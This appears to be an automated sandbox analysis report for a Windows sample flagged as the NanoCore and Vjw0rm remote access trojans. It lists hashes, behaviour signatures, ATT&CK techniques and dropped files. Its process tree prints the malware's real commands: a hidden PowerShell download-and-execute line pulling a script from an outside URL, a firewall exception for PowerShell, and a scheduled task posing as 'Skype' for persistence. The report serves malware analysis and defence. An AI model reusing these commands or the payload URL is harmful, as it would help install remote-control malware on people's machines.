Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    01-07-2021 03:12

General

  • Target

    a80644c814a5b9c8f0618cd82c6c89e3.exe

  • Size

    2.8MB

  • MD5

    a80644c814a5b9c8f0618cd82c6c89e3

  • SHA1

    1f2719208472e54401e66978d919474ab7146a80

  • SHA256

    2d3675bba3da579b093fd576fca9d1a47a3100d358391b5b7f3a368ee35a69e7

  • SHA512

    af27945de7dbb622ded2e708741e48e7250c5ee837c9aea7ffdd4cf2a067dfad8a619b18d9c3c13b6b0cad3d6474560528a28a1960bfeb807a1ac419870312ff

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.uplooder.net/f/tl/77/7b317eef092437d4f2d921c078f9f9b6/as.mp3

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 10 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a80644c814a5b9c8f0618cd82c6c89e3.exe
    "C:\Users\Admin\AppData\Local\Temp\a80644c814a5b9c8f0618cd82c6c89e3.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:784
    • C:\Users\Admin\AppData\Local\Temp\Uxfhfgngxrck.exe
      "C:\Users\Admin\AppData\Local\Temp\Uxfhfgngxrck.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1160
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Yqzbzntutzsvqh.vbs"
      2⤵
      • Drops startup file
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/77/7b317eef092437d4f2d921c078f9f9b6/as.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; DeepDeepDeep
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/77/7b317eef092437d4f2d921c078f9f9b6/as.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; DeepDeepDeep
          4⤵
          • Blocklisted process makes network request
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:888
          • C:\Windows\system32\netsh.exe
            netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
            5⤵
              PID:880
      • C:\Users\Admin\AppData\Local\Temp\Jhrlyd.exe
        "C:\Users\Admin\AppData\Local\Temp\Jhrlyd.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Users\Admin\80089603\npmfgberh.pif
          "C:\Users\Admin\80089603\npmfgberh.pif" vmiifjpegx.akn
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:2016
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Epfgmgx.js"
        2⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1900
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Local\Temp\Epfgmgx.js
          3⤵
          • Creates scheduled task(s)
          PID:1968

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\80089603\npmfgberh.pif
      MD5

      3a662807345100a9670e710c8616d1b5

      SHA1

      0f3b3f0f0a877d9f1ee410ab0a52bcbe0b64356d

      SHA256

      78d69d13a0b072d4f89ad34f4ef07d84917585a5b1d921fb011d8f650ffb88d4

      SHA512

      211ecb470559ecbd25925dee00923f2be07cefeabdc545bccfc756a13345889c3c57ac95b0d9d316bb0cb15b7cb4560daffa64560231f24148648f172a7c224d

    • C:\Users\Admin\80089603\vmiifjpegx.akn
      MD5

      3eb0eca9e417800e56d460ec5845ff0c

      SHA1

      aae789854b0a4f072a829e24efc7a5068e867a16

      SHA256

      8ee9336bb0f0336107ba4b470bf1d7e8899f12eab92c47f87e3b81c6dcef43e0

      SHA512

      4037f6797550dc3b8ece1555fdd2216468f5dc3b05b70346d62ab104742356aa93dc176e3977f5e799afc0e1ad383b913da871fbf9eaae07c2c59cfcf8c60c5e

    • C:\Users\Admin\80089603\xcpukshdi.dll
      MD5

      b7944a2681e9b989ab08c5af834f1c4d

      SHA1

      8479f11fa0e326d34ebaa648367d944221ae2b7d

      SHA256

      83897a8809e8b2517aa6f2ae21d5187307f5e3da1630fc9ef50383e85509429d

      SHA512

      b538085c2329d65a070602a4fc6e3eed8ebcfce50c84624cf2664fbad6b488ec3a5669190996b7998ab22f70a30d25f6105570f18889516e5428d76fa3077fe1

    • C:\Users\Admin\AppData\Local\Temp\Epfgmgx.js
      MD5

      d7b71f138a06d219ff6eaafb06733231

      SHA1

      6271b908d5b42dc46ae4f69cf1728df090d03e10

      SHA256

      fd1263848747160b76cdb9c72d03b5be1022df2ce873fae31b55f397d9eefedf

      SHA512

      0d3334c4dbe4acf273b5366d7074f86eb544058133323315d5f5e91b03660bc569df0361eadb7c9594f64cbaf74bcead59286af78a8ef47a105cdc305a2745f4

    • C:\Users\Admin\AppData\Local\Temp\Jhrlyd.exe
      MD5

      599caffc6adae269e071b7690f511f19

      SHA1

      e70dee7ea28f2407d6a68325c1f68686aa07e1dd

      SHA256

      8630fa7ab4653da756e68b17703841b7c64c1f9222534f5d495af6097ec31dbc

      SHA512

      ea5481fa1263e5b4911fe675edddd1930abc2b5f4f86b162324497b25989ce342c58adcd83ebf22f15879a087b1e4363f8a73f4e9e0d4dcd2727905a3afe38d6

    • C:\Users\Admin\AppData\Local\Temp\Jhrlyd.exe
      MD5

      599caffc6adae269e071b7690f511f19

      SHA1

      e70dee7ea28f2407d6a68325c1f68686aa07e1dd

      SHA256

      8630fa7ab4653da756e68b17703841b7c64c1f9222534f5d495af6097ec31dbc

      SHA512

      ea5481fa1263e5b4911fe675edddd1930abc2b5f4f86b162324497b25989ce342c58adcd83ebf22f15879a087b1e4363f8a73f4e9e0d4dcd2727905a3afe38d6

    • C:\Users\Admin\AppData\Local\Temp\Uxfhfgngxrck.exe
      MD5

      e33b737b368c02ef9b7c908c9472dfef

      SHA1

      89fddd6bdccaf4e27d60c03b760613460d5b3b1b

      SHA256

      983a05b8128f5f45f2eaa693ea2334f1493169fa56ccfb2b6d9ccfb97b46f8da

      SHA512

      cfe944e15ae5d10570ea7a45cc8edc1cebf24dcd691f9b783f8d19cdbb49f9d60cbb28237c634abeed9859defa5be3a7adec2bcb2da488e88ac9901b29a156b9

    • C:\Users\Admin\AppData\Local\Temp\Uxfhfgngxrck.exe
      MD5

      e33b737b368c02ef9b7c908c9472dfef

      SHA1

      89fddd6bdccaf4e27d60c03b760613460d5b3b1b

      SHA256

      983a05b8128f5f45f2eaa693ea2334f1493169fa56ccfb2b6d9ccfb97b46f8da

      SHA512

      cfe944e15ae5d10570ea7a45cc8edc1cebf24dcd691f9b783f8d19cdbb49f9d60cbb28237c634abeed9859defa5be3a7adec2bcb2da488e88ac9901b29a156b9

    • C:\Users\Admin\AppData\Local\Temp\Yqzbzntutzsvqh.vbs
      MD5

      fb0eb16c79f9a0b34dec186274d8b9b4

      SHA1

      53b7976b87a8d3d9d103699e27a8e552a14ceceb

      SHA256

      7fff84f88496aa6d3f0878987f9fddffd908a9801224d44427ed9ad71e7b311c

      SHA512

      e229446e0caf4e523b6f667bdaff534879534dc78119744d7bb7017861c11760261bd72daa53d8750797dc55b88429bcd1e510a446139e0c2c2765c5983c79b0

    • \Users\Admin\80089603\npmfgberh.pif
      MD5

      3a662807345100a9670e710c8616d1b5

      SHA1

      0f3b3f0f0a877d9f1ee410ab0a52bcbe0b64356d

      SHA256

      78d69d13a0b072d4f89ad34f4ef07d84917585a5b1d921fb011d8f650ffb88d4

      SHA512

      211ecb470559ecbd25925dee00923f2be07cefeabdc545bccfc756a13345889c3c57ac95b0d9d316bb0cb15b7cb4560daffa64560231f24148648f172a7c224d

    • \Users\Admin\80089603\npmfgberh.pif
      MD5

      3a662807345100a9670e710c8616d1b5

      SHA1

      0f3b3f0f0a877d9f1ee410ab0a52bcbe0b64356d

      SHA256

      78d69d13a0b072d4f89ad34f4ef07d84917585a5b1d921fb011d8f650ffb88d4

      SHA512

      211ecb470559ecbd25925dee00923f2be07cefeabdc545bccfc756a13345889c3c57ac95b0d9d316bb0cb15b7cb4560daffa64560231f24148648f172a7c224d

    • \Users\Admin\80089603\npmfgberh.pif
      MD5

      3a662807345100a9670e710c8616d1b5

      SHA1

      0f3b3f0f0a877d9f1ee410ab0a52bcbe0b64356d

      SHA256

      78d69d13a0b072d4f89ad34f4ef07d84917585a5b1d921fb011d8f650ffb88d4

      SHA512

      211ecb470559ecbd25925dee00923f2be07cefeabdc545bccfc756a13345889c3c57ac95b0d9d316bb0cb15b7cb4560daffa64560231f24148648f172a7c224d

    • \Users\Admin\80089603\npmfgberh.pif
      MD5

      3a662807345100a9670e710c8616d1b5

      SHA1

      0f3b3f0f0a877d9f1ee410ab0a52bcbe0b64356d

      SHA256

      78d69d13a0b072d4f89ad34f4ef07d84917585a5b1d921fb011d8f650ffb88d4

      SHA512

      211ecb470559ecbd25925dee00923f2be07cefeabdc545bccfc756a13345889c3c57ac95b0d9d316bb0cb15b7cb4560daffa64560231f24148648f172a7c224d

    • \Users\Admin\AppData\Local\Temp\nsi6A87.tmp\System.dll
      MD5

      564bb0373067e1785cba7e4c24aab4bf

      SHA1

      7c9416a01d821b10b2eef97b80899d24014d6fc1

      SHA256

      7a9ddee34562cd3703f1502b5c70e99cd5bba15de2b6845a3555033d7f6cb2a5

      SHA512

      22c61a323cb9293d7ec5c7e7e60674d0e2f7b29d55be25eb3c128ea2cd7440a1400cee17c43896b996278007c0d247f331a9b8964e3a40a0eb1404a9596c4472

    • \Users\Admin\AppData\Local\Temp\nsi6A87.tmp\UAC.dll
      MD5

      adb29e6b186daa765dc750128649b63d

      SHA1

      160cbdc4cb0ac2c142d361df138c537aa7e708c9

      SHA256

      2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08

      SHA512

      b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

    • memory/784-60-0x0000000000C80000-0x0000000000C81000-memory.dmp
      Filesize

      4KB

    • memory/784-62-0x000000001B810000-0x000000001B812000-memory.dmp
      Filesize

      8KB

    • memory/880-104-0x0000000000000000-mapping.dmp
    • memory/888-95-0x0000000001D70000-0x0000000001D71000-memory.dmp
      Filesize

      4KB

    • memory/888-99-0x000000001AD64000-0x000000001AD66000-memory.dmp
      Filesize

      8KB

    • memory/888-103-0x00000000022F0000-0x00000000022F9000-memory.dmp
      Filesize

      36KB

    • memory/888-102-0x000000001B7A0000-0x000000001B7A1000-memory.dmp
      Filesize

      4KB

    • memory/888-100-0x0000000001D40000-0x0000000001D41000-memory.dmp
      Filesize

      4KB

    • memory/888-98-0x000000001AD60000-0x000000001AD62000-memory.dmp
      Filesize

      8KB

    • memory/888-97-0x0000000001E50000-0x0000000001E51000-memory.dmp
      Filesize

      4KB

    • memory/888-96-0x000000001ADE0000-0x000000001ADE1000-memory.dmp
      Filesize

      4KB

    • memory/888-93-0x0000000000000000-mapping.dmp
    • memory/1160-63-0x0000000000000000-mapping.dmp
    • memory/1160-65-0x0000000075AA1000-0x0000000075AA3000-memory.dmp
      Filesize

      8KB

    • memory/1588-82-0x0000000000000000-mapping.dmp
    • memory/1784-92-0x0000000000000000-mapping.dmp
    • memory/1900-69-0x0000000000000000-mapping.dmp
    • memory/1968-86-0x0000000000000000-mapping.dmp
    • memory/2016-90-0x0000000000270000-0x000000000090A000-memory.dmp
      Filesize

      6.6MB

    • memory/2016-101-0x0000000005480000-0x0000000005481000-memory.dmp
      Filesize

      4KB

    • memory/2016-88-0x0000000000270000-0x000000000090A000-memory.dmp
      Filesize

      6.6MB

    • memory/2016-89-0x000000000027C2BE-mapping.dmp
    • memory/2032-72-0x000007FEFB891000-0x000007FEFB893000-memory.dmp
      Filesize

      8KB

    • memory/2032-66-0x0000000000000000-mapping.dmp
    • memory/2036-67-0x0000000000000000-mapping.dmp